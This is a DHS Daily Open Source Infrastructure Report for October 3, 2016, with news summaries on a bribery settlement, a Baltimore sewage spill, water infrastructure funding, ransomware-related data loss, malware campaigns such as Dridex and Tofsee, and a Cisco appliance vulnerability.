Complete DHS Report for October 03, 2016
Daily Report
Top Stories
• Och-Ziff Capital Management Group agreed to pay $200 million
September 29 to settle charges that the firm’s executives used intermediaries
and business partners to pay bribes to high-level government officials in
Africa in order to secure mining rights. – U.S. Securities and Exchange
Commission See item 4 below in
the Financial Services Sector
• The Baltimore City Department of Public Works reported September
29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones
Falls following severe rainstorms in the area that began September 28. – WBFF
45 Baltimore
18. September
29, WBFF 45 Baltimore – (Maryland) At least 10,000 gallons of
sewage, rainwater released into Jones Falls: DPW. The Baltimore City
Department of Public Works reported September 29 that more than 10,000 gallons
of sewage and rainwater flowed into the Jones Falls following severe rainstorms
in the area that began September 28. City officials advised the public to avoid
contact with urban streams. Source: http://foxbaltimore.com/news/local/at-least-10000-gallons-of-sewer-water-released-into-jones-falls-dpw
• The Texas Water Development Board awarded a $5.4 million loan to
the City of Edinburg, Texas September 22 to complete the expansion of the
city’s West Water Treatment Plant. – Edinburg Review
19. September
29, Edinburg Review – (Texas) Edinburg awarded $5.4 million to finish water
treatment plant upgrade. The Texas Water Development Board awarded a $5.4
million loan to the City of Edinburg, Texas September 22 through the agency’s
Drinking Water State Revolving Fund to complete the expansion of the city’s
West Water Treatment Plant. The expansion includes adding 2 raw water pumps, 2
contact reactor clarifiers, and a 2 million gallon ground storage tank, among
other improvements. Source: http://www.edinburgreview.com/news/20160929/edinburg-awarded-54-million-to-finish-water-treatment-plant-upgrade
• The Marin Healthcare District and Prima Medical Foundation
announced September 28 that more than 5,000 patient’s medical data was lost due
to a glitch in their system following a July ransomware attack. – Marin
Independent Journal
20. September
30, Marin Independent Journal – (California) Marin patients’
medical data lost after cyber attack. The Marin Healthcare District and
Prima Medical Foundation announced September 28 they are notifying more than
5,000 patients that their medical data, including limited clinical history,
vital signs, and documentation of physical examinations, among other
information, was lost due to a glitch in Marin Medical Practice Concepts’
system following a ransomware attack in July. Officials stated patients’
personal, financial, and health information was not accessed, viewed, or
transferred. Source: http://www.marinij.com/article/NO/20160929/NEWS/160929766
Financial Services Sector
4. September
29, U.S. Securities and Exchange Commission – (International) Och-Ziff
executives also settle charges. The U.S. Securities and Exchange Commission
(SEC) announced September 29 that Och-Ziff Capital Management Group agreed to
pay roughly $200 million to settle charges that the firm’s executives
disregarded red flags and corruption risks as determined by the Foreign Corrupt
Practices Act (FCPA), and used intermediaries, agents, and business partners to
pay bribes to high-level government officials in Africa in order to secure
mining rights and corruptly influence government officials in 5 African
countries. SEC officials stated that Och-Ziff fraudulently documented the bribe
payments and neglected to maintain proper internal controls to recognize or
prevent the bribes. Source: https://www.sec.gov/news/pressrelease/2016-203.html
5. September
29, SecurityWeek – (International) Dridex banking trojan adopts improved
encryption. MalwareTech security researchers discovered the Dridex banking
trojan started using malicious Rich Text Format (RTF) files that are password
protected in order to prevent automated systems from scanning the attachment
for malicious code and to avoid detection. Researchers also found Dridex
employs delayed execution and may be focused on infecting corporate systems.
6. September
28, U.S. Department of Justice – (International) Dual
Jamaican-U.S. citizen pleads guilty in connection with Jamaica-based lottery
fraud scheme. A dual Jamaican and U.S. citizen pleaded guilty September 28
for her role in a Jamaica-based fraudulent lottery scheme where she persuaded
U.S. citizens to send her hundreds of thousands of dollars to cover fraudulent
fees for lottery winnings that victims had not won and never obtained, causing
U.S. citizens tens of millions of dollars in losses from 2011 – 2012. The
charges state the dual citizen used some of the funds for personal expenses. Source:
https://www.justice.gov/opa/pr/dual-jamaican-us-citizen-pleads-guilty-connection-jamaica-based-lottery-fraud-scheme
Information Technology Sector
23. September
30, SecurityWeek – (International) Tofsee malware distribution switched from
exploit kit to spam. Security researchers from Cisco Talos reported that
attackers stopped distributing the Tofsee ransomware via the RIG exploit kit
(EK), and began leveraging spam email campaigns to deliver the malware
downloaders, which instruct victims to download and open the ZIP archive
attached to the message that contains an obfuscated JavaScript file with a
WScript downloader, which runs an executable from a remote server controlled by
the attacker. Researchers stated the malware allows hackers to conduct
cryptocurrency mining, carry out distributed denial-of-service (DDoS) attacks,
and send spam, among other malicious actions.
For another story, see item 2 below from the Critical Manufacturing Sector
2. September
30, SecurityWeek – (International) Cisco forgets to remove testing interface
from security appliance. Cisco inadvertently introduced a critical
vulnerability in both its physical and virtual Email Security Appliances (ESA)
running IronPort and AsyncOS software that could allow a remote attacker to
gain control of the affected device with root privileges due to an internal
testing and debugging interface that attacks can connect to without
authorization. Cisco advised users to reboot their devices using the reboot
command from the command-line interface in order to disable the internal
testing and debugging interface. Source: http://www.securityweek.com/cisco-forgets-remove-testing-interface-security-appliance
Communications Sector
See item 2 above in the Information Technology
Sector